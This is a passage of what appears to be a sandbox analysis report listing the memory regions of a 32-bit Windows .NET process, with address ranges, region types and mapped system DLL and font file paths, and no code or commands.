region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 379
start_va = 0x69890000
end_va = 0x699fafff
monitored = 0
entry_point = 0x698fe360
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll")
Region:
id = 380
start_va = 0x4a80000
end_va = 0x4c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a80000"
filename = ""
Region:
id = 381
start_va = 0x2170000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002170000"
filename = ""
Region:
id = 382
start_va = 0x4960000
end_va = 0x4a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004960000"
filename = ""
Region:
id = 383
start_va = 0x4a70000
end_va = 0x4a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a70000"
filename = ""
Region:
id = 384
start_va = 0x70950000
end_va = 0x70b40fff
monitored = 0
entry_point = 0x70a33cd0
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll")
Region:
id = 385
start_va = 0x764e0000
end_va = 0x765fefff
monitored = 0
entry_point = 0x76525980
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 386
start_va = 0x21b0000
end_va = 0x21f8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 387
start_va = 0x950000
end_va = 0x953fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 388
start_va = 0x4c70000
end_va = 0x5c6ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 389
start_va = 0x2140000
end_va = 0x2143fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 390
start_va = 0x4a80000
end_va = 0x4b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a80000"
filename = ""
Region:
id = 391
start_va = 0x4c60000
end_va = 0x4c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c60000"
filename = ""
Region:
id = 392
start_va = 0x5c70000
end_va = 0x5d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005c70000"
filename = ""
Region:
id = 393
start_va = 0x5d70000
end_va = 0x6261fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005d70000"
filename = ""
Region:
id = 394
start_va = 0x4b80000
end_va = 0x4c3cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 395
start_va = 0x6270000
end_va = 0x666ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006270000"
filename = ""
Region:
id = 396
start_va = 0x6670000
end_va = 0x674ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 397
start_va = 0x48a0000
end_va = 0x493efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 398
start_va = 0x6750000
end_va = 0x67effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 399
start_va = 0x67f0000
end_va = 0x782ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 400
start_va = 0x2150000
end_va = 0x2150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 401
start_va = 0x7830000
end_va = 0x7891fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 402
start_va = 0x2200000
end_va = 0x220ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002200000"
filename = ""
Region:
id = 403
start_va = 0x2210000
end_va = 0x221ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 404
start_va = 0x4830000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 405
start_va = 0x2210000
end_va = 0x221ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 406
start_va = 0x4830000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 407
start_va = 0x4840000
end_va = 0x484ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004840000"
filename = ""
Region:
id = 408
start_va = 0x4850000
end_va = 0x485ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004850000"
filename = ""
Region:
id = 409
start_va = 0x4830000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 410
start_va = 0x4830000
end_va = 0x486ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 411
start_va = 0x78a0000
end_va = 0x799ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000078a0000"
filename = ""
Region:
id = 412
start_va = 0x79a0000
end_va = 0x899ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000079a0000"
filename = ""
Region:
id = 413
start_va = 0x89a0000
end_va = 0x8b6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089a0000"
filename = ""
Region:
id = 414
start_va = 0x8b70000
end_va = 0x9b6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008b70000"
filename = ""
Region:
id = 415
start_va = 0x9b70000
end_va = 0x9f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009b70000"
filename = ""
Region:
id = 416
start_va = 0x4870000
end_va = 0x487ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004870000"
filename = ""
Region:
id = 417
start_va = 0x4870000
end_va = 0x487ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004870000"
filename = ""
Region:
id = 418
start_va = 0x4830000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 419
start_va = 0x9f10000
end_va = 0x9f4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f10000"
filename = ""
Region:
id = 420
start_va = 0x9f50000
end_va = 0xa04ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f50000"
filename = ""
Region:
id = 421
start_va = 0xa050000
end_va = 0xa08ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a050000"
filename = ""
Region:
id = 422
start_va = 0xa090000
end_va = 0xa18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a090000"
filename = ""
Region:
id = 423
start_va = 0x4830000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004830000"
filename = ""
Region:
id = 424
start_va = 0x4830000
end_va = 0x4832fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004830000"
filename = ""
Region:
id = 425
start_va = 0x4840000
end_va = 0x484ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004840000"
filename = ""
Region:
id = 426
start_va = 0x4840000
end_va = 0x484ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004840000"
filename = ""
Region:
id = 427
start_va = 0x4840000
end_va = 0x484ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004840000"
filename = ""
Region:
id = 428
start_va = 0x78a0000
end_va = 0x791ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000078a0000"
filename = ""
Region:
id = 429
start_va = 0xa190000
end_va = 0xa28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a190000"
filename = ""
Region:
id = 430
start_va = 0x69710000
end_va = 0x69882fff
monitored = 0
entry_point = 0x697bd220
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll")
Region:
id = 431
start_va = 0x7920000
end_va = 0x798bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007920000"
filename = ""
Region:
id = 432
start_va = 0x4850000
end_va = 0x487ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004850000"
filename = ""
Region:
id = 433
start_va = 0x4850000
end_va = 0x485ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004850000"
filename = ""
Region:
id = 434
start_va = 0x4860000
end_va = 0x486ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004860000"
filename = ""
Region:
id = 435
start_va = 0x4870000
end_va = 0x487ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004870000"
filename = ""
Region:
id = 436
start_va = 0x2090000
end_va = 0x20fafff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002090000"
filename = ""
Region:
id = 437
start_va = 0x2100000
end_va = 0x210ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 438
start_va = 0x68ff0000
end_va = 0x6970dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")
Region:
id = 439
start_va = 0x2110000
end_va = 0x211ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002110000"
filename = ""
Region:
id = 440
start_va = 0x5e430000
end_va = 0x5e4cbfff
monitored = 1
entry_point = 0x5e4be9a6
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 441
start_va = 0xa290000
end_va = 0xa32bfff
monitored = 1
entry_point = 0xa31e9a6
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 442
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 443
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 444
start_va = 0x4940000
end_va = 0x494ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004940000"
filename = ""
Region:
id = 445
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 446
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 447
start_va = 0x4c50000
end_va = 0x4c5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c50000"
filename = ""
Region:
id = 448
start_va = 0x7990000
end_va = 0x799ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007990000"
filename = ""
Region:
id = 449
start_va = 0xa330000
end_va = 0xa33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a330000"
filename = ""
Region:
id = 450
start_va = 0xa340000
end_va = 0xa34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a340000"
filename = ""
Region:
id = 451
start_va = 0xa350000
end_va = 0xa35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a350000"
filename = ""
Region:
id = 452
start_va = 0xa360000
end_va = 0xa36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a360000"
filename = ""
Region:
id = 453
start_va = 0xa370000
end_va = 0xa37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a370000"
filename = ""
Region:
id = 454
start_va = 0xa380000
end_va = 0xa38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a380000"
filename = ""
Region:
id = 455
start_va = 0xa390000
end_va = 0xa39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a390000"
filename = ""
Region:
id = 456
start_va = 0xa3a0000
end_va = 0xa3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3a0000"
filename = ""
Region:
id = 457
start_va = 0xa3b0000
end_va = 0xa3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3b0000"
filename = ""
Region:
id = 458
start_va = 0xa3c0000
end_va = 0xa3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3c0000"
filename = ""
Region:
id = 459
start_va = 0xa3d0000
end_va = 0xa3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3d0000"
filename = ""
Region:
id = 460
start_va = 0xa3e0000
end_va = 0xa3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3e0000"
filename = ""
Region:
id = 461
start_va = 0xa3f0000
end_va = 0xa3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3f0000"
filename = ""
Region:
id = 462
start_va = 0xa400000
end_va = 0xa40ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a400000"
filename = ""
Region:
id = 463
start_va = 0xa410000
end_va = 0xa41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 464
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 465
start_va = 0x4940000
end_va = 0x494ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004940000"
filename = ""
Region:
id = 466
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 467
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 468
start_va = 0x4940000
end_va = 0x494ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004940000"
filename = ""
Region:
id = 469
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 470
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 471
start_va = 0x4940000
end_va = 0x494ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004940000"
filename = ""
Region:
id = 472
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 473
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 474
start_va = 0x4c50000
end_va = 0x4c5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c50000"
filename = ""
Region:
id = 475
start_va = 0x7990000
end_va = 0x799ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007990000"
filename = ""
Region:
id = 476
start_va = 0xa330000
end_va = 0xa33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a330000"
filename = ""
Region:
id = 477
start_va = 0xa340000
end_va = 0xa34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a340000"
filename = ""
Region:
id = 478
start_va = 0xa350000
end_va = 0xa35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a350000"
filename = ""
Region:
id = 479
start_va = 0xa360000
end_va = 0xa36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a360000"
filename = ""
Region:
id = 480
start_va = 0xa370000
end_va = 0xa37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a370000"
filename = ""
Region:
id = 481
start_va = 0xa380000
end_va = 0xa38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a380000"
filename = ""
Region:
id = 482
start_va = 0xa390000
end_va = 0xa39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a390000"
filename = ""
Region:
id = 483
start_va = 0xa3a0000
end_va = 0xa3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3a0000"
filename = ""
Region:
id = 484
start_va = 0xa3b0000
end_va = 0xa3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3b0000"
filename = ""
Region:
id = 485
start_va = 0xa3c0000
end_va = 0xa3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3c0000"
filename = ""
Region:
id = 486
start_va = 0xa3d0000
end_va = 0xa3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3d0000"
filename = ""
Region:
id = 487
start_va = 0xa3e0000
end_va = 0xa3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3e0000"
filename = ""
Region:
id = 488
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 489
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 490
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 491
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 492
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 493
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 494
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 495
start_va = 0x4940000
end_va = 0x494ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004940000"
filename = ""
Region:
id = 496
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 497
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 498
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 499
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 500
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 501
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 502
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 503
start_va = 0x4880000
end_va = 0x488ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 504
start_va = 0x74eb0000
end_va = 0x762aefff
monitored = 0
entry_point = 0x7506b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 505
start_va = 0x76800000
end_va = 0x76836fff
monitored = 0
entry_point = 0x76803b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 506
start_va = 0x745b0000
end_va = 0x74aa8fff
monitored = 0
entry_point = 0x747b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 507
start_va = 0x74520000
end_va = 0x745acfff
monitored = 0
entry_point = 0x74569b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 508
start_va = 0x76470000
end_va = 0x764b3fff
monitored = 0
entry_point = 0x76477410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 509
start_va = 0x73f20000
end_va = 0x73f2efff
monitored = 0
entry_point = 0x73f22e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 510
start_va = 0x4a60000
end_va = 0x4a60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004a60000"
filename = ""
Region:
id = 511
start_va = 0x6f770000
end_va = 0x6f797fff
monitored = 0
entry_point = 0x6f777820
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 512
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 513
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 514
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 515
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 516
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 517
start_va = 0x6ecd0000
end_va = 0x6ed40fff
monitored = 0
entry_point = 0x6ed269e0
region_type = mapped_file
name = "efswrt.dll"
filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll")
Region:
id = 518
start_va = 0x6fbe0000
end_va = 0x6fca7fff
monitored = 0
entry_point = 0x6fc4ae90
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll")
Region:
id = 519
start_va = 0x6ec80000
end_va = 0x6ecc8fff
monitored = 0
entry_point = 0x6ec86450
region_type = mapped_file
name = "edputil.dll"
filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll")
Region:
id = 520
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 521
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 522
start_va = 0x68ed0000
end_va = 0x68fecfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\98d3949f9ba1a384939805aa5e47e933\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\98d3949f9ba1a384939805aa5e47e933\\system.management.ni.dll")
Region:
id = 523
start_va = 0xa330000
end_va = 0xa36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a330000"
filename = ""
Region:
id = 524
start_va = 0xa410000
end_va = 0xa50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a410000"
filename = ""
Region:
id = 525
start_va = 0x6fa40000
end_va = 0x6fb8afff
monitored = 0
entry_point = 0x6faa1660
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 526
start_va = 0x4c40000
end_va = 0x4c40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004c40000"
filename = ""
Region:
id = 527
start_va = 0xa370000
end_va = 0xa3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a370000"
filename = ""
Region:
id = 528
start_va = 0xa510000
end_va = 0xa60ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 529
start_va = 0x74340000
end_va = 0x743c3fff
monitored = 0
entry_point = 0x74366220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 530
start_va = 0x71580000
end_va = 0x7179bfff
monitored = 0
entry_point = 0x7174bc40
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")
Region:
id = 531
start_va = 0x4c50000
end_va = 0x4c50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004c50000"
filename = ""
Region:
id = 532
start_va = 0xa3b0000
end_va = 0xa3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3b0000"
filename = ""
Region:
id = 533
start_va = 0xa610000
end_va = 0xa70ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a610000"
filename = ""
Region:
id = 534
start_va = 0x7990000
end_va = 0x7993fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 535
start_va = 0xa710000
end_va = 0xa723fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db")
Region:
id = 536
start_va = 0xa3f0000
end_va = 0xa3f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000a3f0000"
filename = ""
Region:
id = 537
start_va = 0x7990000
